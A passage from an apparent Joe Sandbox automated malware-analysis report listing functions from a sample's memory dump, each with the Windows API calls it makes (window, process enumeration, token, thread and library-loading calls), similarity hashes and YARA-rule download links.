Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e9b3e3760d67f92022cc93b5a6742146307bf115d1693830a7ae855dcf5e47f5
Instruction ID: 9279e59dae8a3851c3392c43991e36b0035998a5286bb64a6f0de19995fde76e
Opcode Fuzzy Hash: e9b3e3760d67f92022cc93b5a6742146307bf115d1693830a7ae855dcf5e47f5
Instruction Fuzzy Hash: CB31F830A00718BFFF26CB658809BFE7BA5ABC5350F04D61AE489521D1D37D89858776

Function 007A7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007A769A
GetWindowRect.USER32(?,?), ref: 007A7710
PtInRect.USER32(?,?,007A8B89), ref: 007A7720
MessageBeep.USER32(00000000), ref: 007A778C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 8222429e87603aa520d2ab989237abd93db59250bd1d72e5fee2c958dc36e2aa
Instruction ID: 5a95ffa9941d253f9e6d829f03537fd33fb6085fb1a26ae83c4b75ec4bcbd60c
Opcode Fuzzy Hash: 8222429e87603aa520d2ab989237abd93db59250bd1d72e5fee2c958dc36e2aa
Instruction Fuzzy Hash: 5041AD34A05254EFCB09CF58CC94EA9B7F4FB8A310F5982A8E4149F261C738A941CF90

Function 007A16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007A16EB

Part of subcall function 00773A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00773A57
Part of subcall function 00773A3D: GetCurrentThreadId.KERNEL32 ref: 00773A5E
Part of subcall function 00773A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007725B3), ref: 00773A65

GetCaretPos.USER32(?), ref: 007A16FF
ClientToScreen.USER32(00000000,?), ref: 007A174C
GetForegroundWindow.USER32 ref: 007A1752

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 75756b039283b4b37f47a5a0488ce62a4494c86dcf847f1687b7e66d50cce1e6
Instruction ID: 199fa5c7aea7d3107031c96be1125a6b4487e95fb12657b37f0ee0272d4b50b1
Opcode Fuzzy Hash: 75756b039283b4b37f47a5a0488ce62a4494c86dcf847f1687b7e66d50cce1e6
Instruction Fuzzy Hash: 84316075D00149AFD704DFA9C8858EEB7FDEF89304B548069E415E7251D7349E41CBA0

Function 0077D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0077D501
Process32FirstW.KERNEL32(00000000,?), ref: 0077D50F
Process32NextW.KERNEL32(00000000,?), ref: 0077D52F
CloseHandle.KERNEL32(00000000), ref: 0077D5DC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 8104bcd26ed86846d14a889cb13d96660b6fb338efbfc9dd99b508baa03a8f99
Instruction ID: fdac29c39eb320e89cdccb77d7d8b6e701500ab5697455adbf8ec287c4ecc539
Opcode Fuzzy Hash: 8104bcd26ed86846d14a889cb13d96660b6fb338efbfc9dd99b508baa03a8f99
Instruction Fuzzy Hash: 5A31B372108300EFD711EF54C895AAFBBF8EFD9384F10452DF685821A1EB759985CBA2

Function 007A8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

GetCursorPos.USER32(?), ref: 007A9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00767711,?,?,?,?,?), ref: 007A9016
GetCursorPos.USER32(?), ref: 007A905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00767711,?,?,?), ref: 007A9094

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: f462a42da49546f0e7588f1cb11eafcf2b4268199ca48b83dfce954557877f9c
Instruction ID: f0bf60ac05fe00f60078d10a4bc04517eef14b801149dcb7f53d9079e9769751
Opcode Fuzzy Hash: f462a42da49546f0e7588f1cb11eafcf2b4268199ca48b83dfce954557877f9c
Instruction Fuzzy Hash: 80219135601018FFCB268F94D859EEB7BB9EB8A391F148155F6054B161C339A960DB60

Function 0077D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,007ACB68), ref: 0077D2FB
GetLastError.KERNEL32 ref: 0077D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0077D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007ACB68), ref: 0077D376

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 3c5a1d118e3be5530d325b5eb120ff8505881f6a09e4a7b43c80b1d1d5a4b344
Instruction ID: e2033a7b7a6cda05b1a3a4209e3f74976e69c63e647c12815b711f823dee028e
Opcode Fuzzy Hash: 3c5a1d118e3be5530d325b5eb120ff8505881f6a09e4a7b43c80b1d1d5a4b344
Instruction Fuzzy Hash: 96214170505201DF8B20DF28C8858AAB7F4AE967A4F508A1DF499C72E1DB39DD46CB93

Function 00771571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00771014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0077102A
Part of subcall function 00771014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00771036
Part of subcall function 00771014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771045
Part of subcall function 00771014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0077104C
Part of subcall function 00771014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007715BE
_memcmp.LIBVCRUNTIME ref: 007715E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00771617
HeapFree.KERNEL32(00000000), ref: 0077161E

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 059e97b7ceb2d038111571109460a32ecb971550b7184d99215dfe4fdb327fc6
Instruction ID: c18340a758ca5b856a792fe0ba322e5ea7d9ea66a17b519caf46b8a5fb471d9c
Opcode Fuzzy Hash: 059e97b7ceb2d038111571109460a32ecb971550b7184d99215dfe4fdb327fc6
Instruction Fuzzy Hash: BB218E71E00108EFDF14DFA8C945BEEB7B8EF85384F598859E445AB241EB38AA05DB50

Function 007A2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 007A280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007A2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007A2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007A2840

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ecf1eb167bdff8218e4161c0c979557d68cd2ba6ccd6f5bae44b3435288c6ef6
Instruction ID: 5a6a8ac9f1b92b1ae98adb612e56604d66089adbb835a953e45b3f2b3c1ba1c5
Opcode Fuzzy Hash: ecf1eb167bdff8218e4161c0c979557d68cd2ba6ccd6f5bae44b3435288c6ef6
Instruction Fuzzy Hash: E321C131605511BFD7159B28C844FAA7B95AFC6324F248258F4268B6E3CB79FD82CB90

Function 007778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00778D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0077790A,?,000000FF,?,00778754,00000000,?,0000001C,?,?), ref: 00778D8C
Part of subcall function 00778D7D: lstrcpyW.KERNEL32(00000000,?,?,0077790A,?,000000FF,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00778DB2
Part of subcall function 00778D7D: lstrcmpiW.KERNEL32(00000000,?,0077790A,?,000000FF,?,00778754,00000000,?,0000001C,?,?), ref: 00778DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00777923
lstrcpyW.KERNEL32(00000000,?,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00777949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00777984

Strings

cdecl, xrefs: 0077797B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 2f9cc81aa916ee87bb30d7fce3009f0ea03a37df69ed71ed29dc8806a07965ed
Instruction ID: a0f678016aa2c16988d50ae74539a815239621dc709e867288bdd05e83e357df
Opcode Fuzzy Hash: 2f9cc81aa916ee87bb30d7fce3009f0ea03a37df69ed71ed29dc8806a07965ed
Instruction Fuzzy Hash: 5B11D63A201201ABCF155F34D849D7A77A9FF95390B50C02AF94AC7264EB39A811CB91

Function 007A7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 007A7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 007A7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007A7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0078B7AD,00000000), ref: 007A7D6B

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: e46b6f90d4002abf92f19974296a6456a8e9dcb148a2e50f866de69765b5bfa9
Instruction ID: e9eea10e247e65331f8f03ba4858b2e7329cae41eeacd5d2fe8fdc35855118a2
Opcode Fuzzy Hash: e46b6f90d4002abf92f19974296a6456a8e9dcb148a2e50f866de69765b5bfa9
Instruction Fuzzy Hash: 0811A231605665AFCB159F28CC04A6A3BA5AF86370B558724F835DB2F0E7389950DB50

Function 007A5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 007A56BB
_wcslen.LIBCMT ref: 007A56CD
_wcslen.LIBCMT ref: 007A56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 007A5816

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 8ec7f131bdd8c6fcded7d30868c053a06f18e2270ed908f4812853992bfc62cc
Instruction ID: d398df136e75f7f940bd601cbf6cdde229c95948103f70c32fe1119d11eed71b
Opcode Fuzzy Hash: 8ec7f131bdd8c6fcded7d30868c053a06f18e2270ed908f4812853992bfc62cc
Instruction Fuzzy Hash: EC110671600604E6DB20DF61CC85EEE377CEF86760F104266F905D6081EB7CD980CB60

Function 00771A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00771A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00771A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00771A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00771A8A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9c3985466b9ad6068fdbf702da99ac7b7c99865a1a63c9bfe81305c9fd6051c6
Instruction ID: 3ad0ef151caf91cbc38a1ac9d145fcd78fc8ef8934586be23d2283e49fbab8e5
Opcode Fuzzy Hash: 9c3985466b9ad6068fdbf702da99ac7b7c99865a1a63c9bfe81305c9fd6051c6
Instruction Fuzzy Hash: 0711393AD01219FFEF11DBA8CD85FADBB78EB08750F218091EA04B7290D6716E50DB94

Function 0077E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0077E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0077E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0077E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0077E24D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 91e317719598e648f81716a15c4115b157ae3b6152272062314fdba0f65d95de
Instruction ID: 8911cbf97687a9996d4ff1e21bc5ccf88ba562772973d7303d0f1619d3d6cd8a
Opcode Fuzzy Hash: 91e317719598e648f81716a15c4115b157ae3b6152272062314fdba0f65d95de
Instruction Fuzzy Hash: 80112F71A04258BBDB019FACDC45A9F7FACAB89354F00C255F814D7291D678CD008765

Function 0073D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0073CFF9,00000000,00000004,00000000), ref: 0073D218
GetLastError.KERNEL32 ref: 0073D224
__dosmaperr.LIBCMT ref: 0073D22B
ResumeThread.KERNEL32(00000000), ref: 0073D249

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: b43233843b4a70fc5600e370aab970dc28102fd01eab50107b4e3fc98def2bdd
Instruction ID: 9f26d44dce493e0d6c1e303b9c5e96af101de495cbe113c63683824108f2e0a9
Opcode Fuzzy Hash: b43233843b4a70fc5600e370aab970dc28102fd01eab50107b4e3fc98def2bdd
Instruction Fuzzy Hash: F5012632805108BBEB315BA5EC09BAF3A6CEF82330F104219F924921D2CF79CC01C6A1

Function 0071600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0071604C
GetStockObject.GDI32(00000011), ref: 00716060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0071606A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: f96b536cc5d7791d9bf739a5debaef31921c81f28bb63e41ad3845cabd22f155
Instruction ID: b16116216a3d24536e27ba48669843f9bfe5fb09d4870dfdcfc96ed6d6235638
Opcode Fuzzy Hash: f96b536cc5d7791d9bf739a5debaef31921c81f28bb63e41ad3845cabd22f155
Instruction Fuzzy Hash: 5F116D72501548BFEF128FA8DC45EEABBA9EF4D3A4F044215FA1452150D73A9CA0DBA0

Function 00733B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00733B56

Part of subcall function 00733AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00733AD2
Part of subcall function 00733AA3: ___AdjustPointer.LIBCMT ref: 00733AED

_UnwindNestedFrames.LIBCMT ref: 00733B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00733B7C
CallCatchBlock.LIBVCRUNTIME ref: 00733BA4

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: fb773ee0a676afe724b71170e27e3788d94d1134f51c031a22b100f50fe37024
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 19012972100148BBEF225E95CC46EEB7B6AEF48754F044014FE4866122C73AE961DBA0

Function 00743073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007113C6,00000000,00000000,?,0074301A,007113C6,00000000,00000000,00000000,?,0074328B,00000006,FlsSetValue), ref: 007430A5
GetLastError.KERNEL32(?,0074301A,007113C6,00000000,00000000,00000000,?,0074328B,00000006,FlsSetValue,007B2290,FlsSetValue,00000000,00000364,?,00742E46), ref: 007430B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0074301A,007113C6,00000000,00000000,00000000,?,0074328B,00000006,FlsSetValue,007B2290,FlsSetValue,00000000), ref: 007430BF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4a1a8d35da4acb023a0540a27b39e6112f871098e2351a9d12ac1efb0845a0ea
Instruction ID: d6d4cceb2e85661b7d54412e8a28d640fc32cab3a9c5e2751c1d397920ba2bd9
Opcode Fuzzy Hash: 4a1a8d35da4acb023a0540a27b39e6112f871098e2351a9d12ac1efb0845a0ea
Instruction Fuzzy Hash: 73012B32301226BBCB314B789C45A577B9AAF46B61B204720F91DE71A0C72DD901C6E4

Function 00777464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0077747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00777497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007774AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007774CA

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

